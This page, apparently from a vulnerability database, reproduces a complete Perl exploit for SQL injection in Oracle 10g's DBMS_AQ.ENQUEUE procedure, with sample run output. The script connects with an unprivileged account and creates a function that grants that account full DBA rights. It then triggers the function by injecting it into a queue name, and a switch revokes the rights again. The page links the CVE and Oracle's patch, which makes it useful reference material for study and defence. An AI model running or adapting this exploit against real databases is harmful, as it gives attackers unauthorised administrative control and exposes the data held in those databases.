Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:6570
HistoryApr 03, 2007 - 12:00 a.m.

Oracle 10g DBMS_AQ.ENQUEUE SQL Injection Exploit

2007-04-0300:00:00
Root
www.seebug.org
22

0.006 Low

EPSS

Percentile

75.1%

JSON

No description provided by source.


                                                #!/usr/bin/perl
#
# [0-day] Remote Oracle DBMS_AQ.ENQUEUE exploit (10g)
#
# Grant or revoke dba permission to unprivileged user
# 
# Tested on \"Oracle Database 10g Enterprise Edition Release 10.1.0.3.0\"
#   
#   AUTHOR: Andrea \"bunker\" Purificato
#           http://rawlab.mindcreations.com
#
#   DATE:   Copyright 2007 - Mon Apr  2 11:54:22 CEST 2007
#  
#   PATCH:  http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2007.html 
#	    (CVE-2007-0268 ?)
#
#
# Oracle InstantClient (basic + sdk) required for DBD::Oracle
# 
#
# bunker@fin:~/orasploit$ perl dbms_aq-enqueue.pl -h localhost -s test -u bunker -p **** -r
#  [-] Wait...
#  [-] Revoking DBA from BUNKER...
#  DBD::Oracle::db do failed: ORA-01951: ROLE \'DBA\' not granted to \'BUNKER\' (DBD ERROR: OCIStmtExecute) [for Statement \"REVOKE DBA FROM BUNKER\"] at dbms_aq-enqueue.pl line 95.
#  [-] Done!
# 
# bunker@fin:~/orasploit$ perl dbms_aq-enqueue.pl -h localhost -s test -u bunker -p **** -g
#  [-] Wait...
#  [-] Creating evil function...
#  [-] Go ...(don\'t worry about errors)!
#  DBD::Oracle::st execute failed: ORA-25205: the QUEUE BUNKER.\'burp\' does not exist
#  ORA-06512: at \"SYS.DBMS_AQ\", line 6
#  ORA-06512: at \"SYS.DBMS_AQ\", line 215
#  ORA-06512: at line 10 (DBD ERROR: OCIStmtExecute) [for Statement \"
#  DECLARE
#      ident   VARCHAR2(100);
#      enq_opt dbms_aq.enqueue_options_t;
#      msg_prp dbms_aq.message_properties_t;
#      msgid   raw(100);
#      payload raw(100);
#  BEGIN
#      ident := \'\"\'\'\'||BUNKER.own||\'\'\'\"\';
#      dbms_aq.enqueue(ident, enq_opt,msg_prp, payload, msgid);
#  END;
#  \"] at dbms_aq-enqueue.pl line 125.
#  [-] YOU GOT THE POWAH!!
# 
# bunker@fin:~/orasploit$ perl dbms_aq-enqueue.pl -h localhost -s test -u bunker -p **** -r
#  [-] Wait...
#  [-] Revoking DBA from BUNKER...
#  [-] Done!
#

use warnings;
use strict;
use DBI;
use Getopt::Std;
use vars qw/ %opt /;

sub usage {
&nbsp;&nbsp;&nbsp;&nbsp;print&nbsp;<<\"USAGE\";
&nbsp;&nbsp;&nbsp;&nbsp;
Syntax:&nbsp;$0&nbsp;-h&nbsp;<host>&nbsp;-s&nbsp;<sid>&nbsp;-u&nbsp;<user>&nbsp;-p&nbsp;<passwd>&nbsp;-g|-r&nbsp;[-P&nbsp;<port>]

Options:
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-h&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<host>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;target&nbsp;server&nbsp;address
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-s&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<sid>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;target&nbsp;sid&nbsp;name
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-u&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<user>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;user
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-p&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<passwd>&nbsp;&nbsp;&nbsp;password&nbsp;

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-g|-r&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(g)rant&nbsp;dba&nbsp;to&nbsp;user&nbsp;|&nbsp;(r)evoke&nbsp;dba&nbsp;from&nbsp;user
&nbsp;&nbsp;&nbsp;&nbsp;[-P&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<port>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Oracle&nbsp;port]

USAGE
&nbsp;&nbsp;&nbsp;&nbsp;exit&nbsp;0
}

my&nbsp;$opt_string&nbsp;=&nbsp;\'h:s:u:p:grP:\';
getopts($opt_string,&nbsp;\\%opt)&nbsp;or&nbsp;&usage;
&usage&nbsp;if&nbsp;(&nbsp;!$opt{h}&nbsp;or&nbsp;!$opt{s}&nbsp;or&nbsp;!$opt{u}&nbsp;or&nbsp;!$opt{p}&nbsp;);
&usage&nbsp;if&nbsp;(&nbsp;!$opt{g}&nbsp;and&nbsp;!$opt{r}&nbsp;);
my&nbsp;$user&nbsp;=&nbsp;uc&nbsp;$opt{u};

my&nbsp;$dbh&nbsp;=&nbsp;undef;
if&nbsp;($opt{P})&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;$dbh&nbsp;=&nbsp;DBI->connect(\"dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}\",&nbsp;$opt{u},&nbsp;$opt{p})&nbsp;or&nbsp;die;
}&nbsp;else&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;$dbh&nbsp;=&nbsp;DBI->connect(\"dbi:Oracle:host=$opt{h};sid=$opt{s}\",&nbsp;$opt{u},&nbsp;$opt{p})&nbsp;or&nbsp;die;
}

my&nbsp;$sqlcmd&nbsp;=&nbsp;\"GRANT&nbsp;ALL&nbsp;PRIVILEGE,&nbsp;DBA&nbsp;TO&nbsp;$user\";
print&nbsp;\"[-]&nbsp;Wait...
\";

if&nbsp;($opt{r})&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;print&nbsp;\"[-]&nbsp;Revoking&nbsp;DBA&nbsp;from&nbsp;$user...
\";
&nbsp;&nbsp;&nbsp;&nbsp;$sqlcmd&nbsp;=&nbsp;\"REVOKE&nbsp;DBA&nbsp;FROM&nbsp;$user\";
&nbsp;&nbsp;&nbsp;&nbsp;$dbh->do(&nbsp;$sqlcmd&nbsp;);
&nbsp;&nbsp;&nbsp;&nbsp;print&nbsp;\"[-]&nbsp;Done!
\";
&nbsp;&nbsp;&nbsp;&nbsp;$dbh->disconnect;
&nbsp;&nbsp;&nbsp;&nbsp;exit;
}

print&nbsp;\"[-]&nbsp;Creating&nbsp;evil&nbsp;function...
\";
$dbh->do(&nbsp;qq{
CREATE&nbsp;OR&nbsp;REPLACE&nbsp;FUNCTION&nbsp;OWN&nbsp;RETURN&nbsp;VARCHAR&nbsp;
&nbsp;AUTHID&nbsp;CURRENT_USER&nbsp;AS&nbsp;
&nbsp;PRAGMA&nbsp;AUTONOMOUS_TRANSACTION;&nbsp;
BEGIN
&nbsp;EXECUTE&nbsp;IMMEDIATE&nbsp;\'$sqlcmd\';&nbsp;COMMIT;&nbsp;
&nbsp;RETURN&nbsp;\'burp\';
END;
}&nbsp;);
&nbsp;
print&nbsp;\"[-]&nbsp;Go&nbsp;...(don\'t&nbsp;worry&nbsp;about&nbsp;errors)!
\";
my&nbsp;$sth&nbsp;=&nbsp;$dbh->prepare(&nbsp;qq{
DECLARE
&nbsp;&nbsp;&nbsp;&nbsp;ident&nbsp;&nbsp;&nbsp;VARCHAR2(100);
&nbsp;&nbsp;&nbsp;&nbsp;enq_opt&nbsp;dbms_aq.enqueue_options_t;
&nbsp;&nbsp;&nbsp;&nbsp;msg_prp&nbsp;dbms_aq.message_properties_t;
&nbsp;&nbsp;&nbsp;&nbsp;msgid&nbsp;&nbsp;&nbsp;raw(100);
&nbsp;&nbsp;&nbsp;&nbsp;payload&nbsp;raw(100);
BEGIN
&nbsp;&nbsp;&nbsp;&nbsp;ident&nbsp;:=&nbsp;\'\"\'\'\'||$user.own||\'\'\'\"\';
&nbsp;&nbsp;&nbsp;&nbsp;dbms_aq.enqueue(ident,&nbsp;enq_opt,msg_prp,&nbsp;payload,&nbsp;msgid);&nbsp;
END;
});
$sth->execute;
$sth->finish;
print&nbsp;\"[-]&nbsp;YOU&nbsp;GOT&nbsp;THE&nbsp;POWAH!!
\";
$dbh->disconnect;
exit;

&nbsp;

Related

packetstorm 1
cve 1
prion 1
nessus 1
securityvulns 1
packetstorm
packetstorm
dbms_aq-enqueue.txt
2007-04-02 00:00:00
cve
cve
CVE-2007-0268
2007-01-17 02:28:00
prion
prion
Sql injection
2007-01-17 02:28:00
nessus
nessus
Oracle Database Multiple Vulnerabilities (January 2007 CPU)
2011-11-16 00:00:00
securityvulns
securityvulns
Multiple Orcale security vulnerabilities.... again...
2007-02-01 00:00:00

0.006 Low

EPSS

Percentile

75.1%

JSON
Related for SSV:6570
packetstorm1cve1prion1nessus1securityvulns1